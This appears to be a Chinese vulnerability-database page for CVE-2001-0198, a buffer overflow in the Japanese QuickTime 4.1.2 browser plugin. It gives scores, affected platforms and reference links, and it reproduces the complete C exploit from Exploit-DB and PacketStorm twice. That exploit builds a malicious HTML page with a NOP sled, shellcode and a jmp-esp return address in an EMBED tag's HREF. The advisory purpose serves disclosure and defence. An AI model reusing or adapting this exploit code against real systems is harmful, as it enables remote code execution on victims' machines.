CVE-2001-0198
CVSS7.6
发布时间 :2001-05-03 00:00:00
修订时间 :2016-10-17 22:10:11
NMCOEPS    

[原文]Buffer overflow in QuickTime Player plugin 4.1.2 (Japanese) allows remote attackers to execute arbitrary commands via a long HREF parameter in an EMBED tag.


[CNNVD]QuickTime Player插件缓冲区溢出漏洞(CNNVD-200105-020)

        QuickTime Player插件4.1.2(日本) 存在缓冲区溢出漏洞。远程攻击者可以借助EMBED标签中超长HREF参数执行任意命令。

- CVSS (基础分值)

CVSS分值: 7.6 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:apple:quicktime:4.1.2:::japanese
cpe:/a:apple:quicktime:4.1.2Apple Quicktime 4.1.2

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0198
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0198
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200105-020
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=98096678523370&w=2
(UNKNOWN)  BUGTRAQ  20010131 [SPSadvisory#41]Apple Quick Time Plug-in Buffer Overflow
http://www.exploit-db.com/exploits/20605
(UNKNOWN)  EXPLOIT-DB  20605
http://www.securityfocus.com/bid/2328
(VENDOR_ADVISORY)  BID  2328
http://xforce.iss.net/static/6040.php
(VENDOR_ADVISORY)  XF  quicktime-embedded-tag-bo

- 漏洞信息

QuickTime Player插件缓冲区溢出漏洞
高危 缓冲区溢出
2001-05-03 00:00:00 2006-06-15 00:00:00
远程※本地  
        QuickTime Player插件4.1.2(日本) 存在缓冲区溢出漏洞。远程攻击者可以借助EMBED标签中超长HREF参数执行任意命令。

- 公告与补丁

        Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- 漏洞信息 (20605)

Apple Quicktime plugin - Windows 4.1.2 (Japanese) Remote Overflow Vulnerability (EDBID:20605)
windows remote
2012-08-18 Verified
0 UNYUN
N/A [点击下载]
source: http://www.securityfocus.com/bid/2328/info

Apple Quicktime plugin for Windows is vulnerable to a remote buffer overflow.

A maliciously-constructed web link statement in a remote HTML document, which contains excess data argumenting an EMBED tag, could permit execution of hostile code. 

/*====================================================================
   Apple QuickTime 4.1.2 plug-in exploit
   The Shadow Penguin Security (http://shadowpenguin.backsection.net)
   Written by UNYUN (shadowpenguin@backsection.net)
  ====================================================================
*/

#include    <stdio.h>
#include    <stdlib.h>
#include    <windows.h>

#define MOV_FILE    "c:\\program files\\quicktime\\sample.mov"
#define HEIGHT      60
#define WIDTH       60
#define TARGET      "QUICKTIMEPLAYER"
#define FILE_IMAGE  \
                    "<html><embed src=\"%s\" href=\"%s\" "\
                    "width=%d height=%d autoplay=\"true\" "\
                    "target=\"%s\"><br></html>"
#define BUFSIZE     730
#define RET         684
#define ESP_TGT     "rpcrt4.dll"
#define JMPESP_1    0xff
#define JMPESP_2    0xe4
#define NOP         0x90

unsigned char   exploit_code[200]={
        0x33,0xC0,0x40,0x40,0x40,0x40,0x40,0x50,
        0x50,0x90,0xB8,0x2D,0x23,0xF5,0xBF,0x48,
        0xFF,0xD0,0x00,
};

main(int argc,char *argv[])
{
    FILE            *fp;
    char            buf[BUFSIZE];
    unsigned int    i,pretadr,p,ip,kp;
    MEMORY_BASIC_INFORMATION meminfo;

    if (argc<2){
        printf("usage : %s Output_HTML-fileName [Sample .mov file]\n",
               argv[0]);
        exit(1);
    }

    if ((void *)(kp=(unsigned int)LoadLibrary(ESP_TGT))==NULL){
         printf("%s is not found.\n",ESP_TGT);
         exit(1);
    }

    VirtualQuery((void *)kp,&meminfo,sizeof(MEMORY_BASIC_INFORMATION));
    pretadr=0;
    for (i=0;i<meminfo.RegionSize;i++){
        p=kp+i;
        if (  ( p     &0xff)==0
           || ((p>>8 )&0xff)==0
           || ((p>>16)&0xff)==0
           || ((p>>24)&0xff)==0) continue;
        if (   *((unsigned char *)p)==JMPESP_1
            && *(((unsigned char *)p)+1)==JMPESP_2)
            pretadr=p;
    }
    if ((fp=fopen(argv[1],"wb"))==NULL){
        printf("File write error \"%s\"\n",argv[1]);
        exit(1);
    }
    memset(buf,NOP,BUFSIZE);
    memcpy(buf+700-12,exploit_code,strlen(exploit_code));
    buf[BUFSIZE-2]=0;

    ip=pretadr;
    printf("EIP=%x\n",ip);
    buf[RET  ]=ip&0xff;
    buf[RET+1]=(ip>>8)&0xff;
    buf[RET+2]=(ip>>16)&0xff;
    buf[RET+3]=(ip>>24)&0xff;

    if (argc==2)
        fprintf(fp,FILE_IMAGE,MOV_FILE,buf,WIDTH,HEIGHT,TARGET);
    else
        fprintf(fp,FILE_IMAGE,argv[2],buf,WIDTH,HEIGHT,TARGET);
    fclose(fp);
    printf("Done.\n");
 }

-----
UNYUN
% The Shadow Penguin Security [ http://shadowpenguin.backsection.net ]
   shadowpenguin@backsection.net (SPS-Official)
   unyun@shadowpenguin.org (Personal)
% eEye Digital Security Team [ http://www.eEye.com ]
   unyun@eEye.com
		

- 漏洞信息 (F115697)

Apple Windows Quicktime Plugin 4.1.2 Overflow (PacketStormID:F115697)
2012-08-18 00:00:00
Unyun  
exploit,remote,overflow
windows,apple
CVE-2001-0198
[点击下载]

The Apple Quicktime plugin for Windows is vulnerable to a remote buffer overflow vulnerability.

Apple Quicktime plugin for Windows is vulnerable to a remote buffer overflow.
 
A maliciously-constructed web link statement in a remote HTML document, which contains excess data argumenting an EMBED tag, could permit execution of hostile code.
 
/*====================================================================
   Apple QuickTime 4.1.2 plug-in exploit
   The Shadow Penguin Security (http://shadowpenguin.backsection.net)
   Written by UNYUN (shadowpenguin@backsection.net)
  ====================================================================
*/
 
#include    <stdio.h>
#include    <stdlib.h>
#include    <windows.h>
 
#define MOV_FILE    "c:\\program files\\quicktime\\sample.mov"
#define HEIGHT      60
#define WIDTH       60
#define TARGET      "QUICKTIMEPLAYER"
#define FILE_IMAGE  \
                    "<html><embed src=\"%s\" href=\"%s\" "\
                    "width=%d height=%d autoplay=\"true\" "\
                    "target=\"%s\"><br></html>"
#define BUFSIZE     730
#define RET         684
#define ESP_TGT     "rpcrt4.dll"
#define JMPESP_1    0xff
#define JMPESP_2    0xe4
#define NOP         0x90
 
unsigned char   exploit_code[200]={
        0x33,0xC0,0x40,0x40,0x40,0x40,0x40,0x50,
        0x50,0x90,0xB8,0x2D,0x23,0xF5,0xBF,0x48,
        0xFF,0xD0,0x00,
};
 
main(int argc,char *argv[])
{
    FILE            *fp;
    char            buf[BUFSIZE];
    unsigned int    i,pretadr,p,ip,kp;
    MEMORY_BASIC_INFORMATION meminfo;
 
    if (argc<2){
        printf("usage : %s Output_HTML-fileName [Sample .mov file]\n",
               argv[0]);
        exit(1);
    }
 
    if ((void *)(kp=(unsigned int)LoadLibrary(ESP_TGT))==NULL){
         printf("%s is not found.\n",ESP_TGT);
         exit(1);
    }
 
    VirtualQuery((void *)kp,&meminfo,sizeof(MEMORY_BASIC_INFORMATION));
    pretadr=0;
    for (i=0;i<meminfo.RegionSize;i++){
        p=kp+i;
        if (  ( p     &0xff)==0
           || ((p>>8 )&0xff)==0
           || ((p>>16)&0xff)==0
           || ((p>>24)&0xff)==0) continue;
        if (   *((unsigned char *)p)==JMPESP_1
            && *(((unsigned char *)p)+1)==JMPESP_2)
            pretadr=p;
    }
    if ((fp=fopen(argv[1],"wb"))==NULL){
        printf("File write error \"%s\"\n",argv[1]);
        exit(1);
    }
    memset(buf,NOP,BUFSIZE);
    memcpy(buf+700-12,exploit_code,strlen(exploit_code));
    buf[BUFSIZE-2]=0;
 
    ip=pretadr;
    printf("EIP=%x\n",ip);
    buf[RET  ]=ip&0xff;
    buf[RET+1]=(ip>>8)&0xff;
    buf[RET+2]=(ip>>16)&0xff;
    buf[RET+3]=(ip>>24)&0xff;
 
    if (argc==2)
        fprintf(fp,FILE_IMAGE,MOV_FILE,buf,WIDTH,HEIGHT,TARGET);
    else
        fprintf(fp,FILE_IMAGE,argv[2],buf,WIDTH,HEIGHT,TARGET);
    fclose(fp);
    printf("Done.\n");
 }
 
-----
UNYUN
% The Shadow Penguin Security [ http://shadowpenguin.backsection.net ]
   shadowpenguin@backsection.net (SPS-Official)
   unyun@shadowpenguin.org (Personal)
% eEye Digital Security Team [ http://www.eEye.com ]
   unyun@eEye.com


    

- 漏洞信息

10560
Apple QuickTime Player (Japanese) EMBED Tag Handling Overflow
Context Dependent Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

- 时间线

2001-01-31 Unknow
2001-01-31 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Apple Quicktime Plugin Remote Overflow Vulnerability
Input Validation Error 2328
Yes Yes
2001-01-31 12:00:00 2009-07-11 04:46:00
Reported to bugtraq by UNYUN <shadowpenguin@backsection.net> on Wed, 31 Jan 2001.

- 受影响的程序版本

Apple Quicktime plugin - Windows 4.1.2 (Japanese)
- Microsoft Windows 95
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0

- 漏洞讨论

Apple Quicktime plugin for Windows is vulnerable to a remote buffer overflow.

A maliciously-constructed web link statement in a remote HTML document, which contains excess data argumenting an EMBED tag, could permit execution of hostile code.

- 漏洞利用

Apple QuickTime 4.1.2 plug-in exploit
The Shadow Penguin Security(http://shadowpenguin.backsection.net)
Written by UNYUN (shadowpenguin@backsection.net)

This sample code can be compiled by Visual C++ 6.0. This sample code was checked under the environmentof Windows98 Second Edition (Japanese)+ Internet Explorer5.0.

- 解决方案

Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

     

     

    关于SCAP中文社区

    SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

    版权声明

    CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站